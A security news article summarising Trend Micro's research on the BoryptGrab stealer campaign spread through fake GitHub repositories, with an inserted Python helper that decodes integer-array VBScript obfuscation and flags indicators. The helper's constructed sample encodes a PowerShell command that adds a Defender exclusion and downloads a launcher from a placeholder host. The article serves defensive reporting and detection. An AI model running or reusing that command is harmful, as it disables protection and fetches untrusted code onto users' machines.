Massive GitHub malware operation spreads BoryptGrab stealer
2026-3-8 13:38:12 Author: securityaffairs.com


Trend Micro found BoryptGrab stealer spreading through 100+ GitHub repositories, stealing browser data, crypto wallets, system information, and user files.

Trend Micro uncovered a campaign distributing the BoryptGrab information stealer through more than 100 GitHub repositories.

BoryptGrab is designed to collect browser and cryptocurrency wallet data, system details, and common files. Some variants also deploy a PyInstaller backdoor called TunnesshClient, which creates a reverse SSH tunnel to communicate with attackers.

The malware is distributed via ZIP archives posing as software tools and game cheats, linked to over 100 GitHub repositories.

“By tracing the infection chain, we were able to observe several ZIP archive files in the wild (all with similar naming conventions) that masquerade as common software tools (including gaming cheat hacks),” reads the report published by Trend Micro. “As the ‘github-io’ patterns in some ZIP file names suggest, searching for the software tool patterns leads to over a hundred public GitHub repositories delivering malware.”

Evidence such as Russian-language comments and infrastructure suggests the threat actors may have a Russian origin.

Attackers spread the malware through public GitHub repositories that pose as free software tools, game cheats, or utilities.

They stuff README files with SEO keywords so search engines rank the malicious repositories near legitimate results. One example mimics a Voicemod Pro download page and links to a GitHub-hosted site that looks like a normal project directory.

The page contains Russian comments and redirects visitors through a chain of encoded URLs until it reaches a fake download page that generates a ZIP archive containing the malware. Many repositories reuse the same logic and sometimes send tracking data to the attackers.

The downloaded ZIP files launch the infection through several methods. In one route, an executable side-loads a malicious libcurl.dll that decrypts a hidden launcher payload.

The launcher downloads the BoryptGrab information stealer and may also retrieve other payloads, including Vidar variants, a PyInstaller backdoor called TunnesshClient, and a Golang downloader named HeaconLoad. The launcher uses build names such as Shrek, Leon, or CryptoByte to request specific payloads and sets scheduled tasks to keep the malware running.

“Some launcher payload variants contain build names (with some differing from each other). The launcher payload passes the build name as the ‘-b’ argument when executing the BoryptGrab stealer it downloads,” continues the report.

Another infection path uses a VBS downloader that hides commands inside integer arrays. The script decodes PowerShell commands, downloads a launcher from a remote server, and can even add Microsoft Defender exclusions to avoid detection. That launcher then retrieves the BoryptGrab stealer and other tools from the attacker’s infrastructure.
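The integer-array trick used by that VBS downloader is cheap to undo at triage time. As an added example (not code from the article or from Trend Micro), the Python helper below decodes such arrays, assuming one character code per element since the article does not give the real sample's exact scheme, and flags the behaviours the article attributes to the decoded PowerShell (Defender exclusions, downloading a launcher, hidden window). The sample script and the indicator list are constructed for illustration.

```python
"""Decode integer-array-encoded strings in a VBScript and flag the
PowerShell behaviours described for the BoryptGrab VBS downloader."""
import re
from typing import Dict, List

# Matches Array(1, 2, 3, ...) literals with at least four numeric elements.
ARRAY_RE = re.compile(r"Array\(\s*((?:\d+\s*,\s*){3,}\d+)\s*\)", re.IGNORECASE)

# Detection indicators (assumed; derived from the behaviours the article lists).
INDICATORS: Dict[str, re.Pattern] = {
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-Exclusion", re.I),
    "remote_download": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}

def decode_integer_arrays(vbs_source: str) -> List[str]:
    """Decode each integer array as a string of character codes.
    Assumes one code point per element; arrays holding values outside
    the valid code-point range are skipped as non-text data."""
    decoded = []
    for m in ARRAY_RE.finditer(vbs_source):
        values = [int(v) for v in m.group(1).split(",")]
        if all(9 <= v < 0x110000 for v in values):
            decoded.append("".join(chr(v) for v in values))
    return decoded

def analyse(vbs_source: str) -> Dict[str, List[str]]:
    """Return {decoded_string: [names of matching indicators]}."""
    return {s: [name for name, rx in INDICATORS.items() if rx.search(s)]
            for s in decode_integer_arrays(vbs_source)}

# Constructed sample, not the real downloader: one benign string and one
# command resembling the Defender-exclusion plus launcher-download behaviour.
def _encode(s: str) -> str:
    return "Array(" + ",".join(str(ord(c)) for c in s) + ")"

SAMPLE_VBS = "\n".join([
    "Dim greeting, cmd",
    "greeting = " + _encode("hello"),
    "cmd = " + _encode('powershell -nop -w hidden -c "Add-MpPreference -ExclusionPath $env:TEMP; '
                       "(New-Object Net.WebClient).DownloadFile('http://example.invalid/launcher', $env:TEMP)\""),
])

if __name__ == "__main__":
    for text, hits in analyse(SAMPLE_VBS).items():
        print(f"{hits or ['clean']}: {text[:60]}")
```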

In some variants, a .NET loader or embedded scripts trigger the same process, while others include the HeaconLoad downloader directly. HeaconLoad maintains persistence with registry entries and scheduled tasks, sends system information to a command-and-control server, and downloads additional bundles when available.

Several payloads rely on obfuscation techniques such as XOR-encrypted strings, dynamic API resolution, and code injection. Russian-language comments and log messages appear throughout the infrastructure and malware samples, suggesting the operators likely have a Russian background.

BoryptGrab is a C/C++ information stealer designed to collect large amounts of sensitive data from infected systems. The malware accepts optional command-line arguments such as --output-path to define where stolen data will be stored and --build-name to tag collected information. If attackers do not provide a build name, the malware uses a default value or relies on hardcoded identifiers such as CryptoByte, Shrek, Sonic, or Yaropolk, which help operators track infections.

Before collecting data, BoryptGrab performs anti-analysis checks.

“BoryptGrab detects whether it is executed in a virtual machine environment by querying registry entries and checking VM-related files. As part of its anti-analysis check, BoryptGrab also compares the names of running processes against a predefined list. It also attempts to execute with elevated privilege,” continues the report. “When the ‘--output-path’/‘-o’ argument is not given, BoryptGrab formats a default output path name using the current time, public IP address, and country code. Later, a directory with this output path name is created to stage collected data.”

It searches for signs of virtual machines, scans running processes against a predefined list, and attempts to gain elevated privileges. If no output path is specified, it creates a directory using the current time, public IP address, and country code to store stolen data.

The stealer targets data from many browsers, including Chrome, Edge, Firefox, Opera, Brave, Vivaldi, and Yandex. It uses techniques from public GitHub tools designed to bypass Chrome’s App-Bound Encryption and decrypt stored browser credentials. The malware loads an encrypted internal payload that extracts saved passwords and records installed applications.

BoryptGrab also downloads a helper tool to assist with Chromium-based browser extraction. Beyond browser data, it steals information from numerous desktop cryptocurrency wallets such as Exodus, Electrum, Ledger Live, Atomic, Binance, Wasabi, and Trezor. It captures screenshots, gathers system details, and includes a “file grabber” module that collects files with specific extensions from common directories. The malware also extracts Telegram files, browser passwords, and in newer variants, Discord tokens.

After gathering the data, BoryptGrab compresses and uploads the archive to the attacker’s server. Some variants also download TunnesshClient, a PyInstaller backdoor that establishes a reverse SSH tunnel, allowing attackers to run commands, move files, and use the infected system as a proxy.

“The BoryptGrab campaign illustrates an evolving threat ecosystem targeting users through deceptive software downloads and fake GitHub repositories.” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, malware)




Article source: https://securityaffairs.com/189110/malware/massive-github-malware-operation-spreads-boryptgrab-stealer.html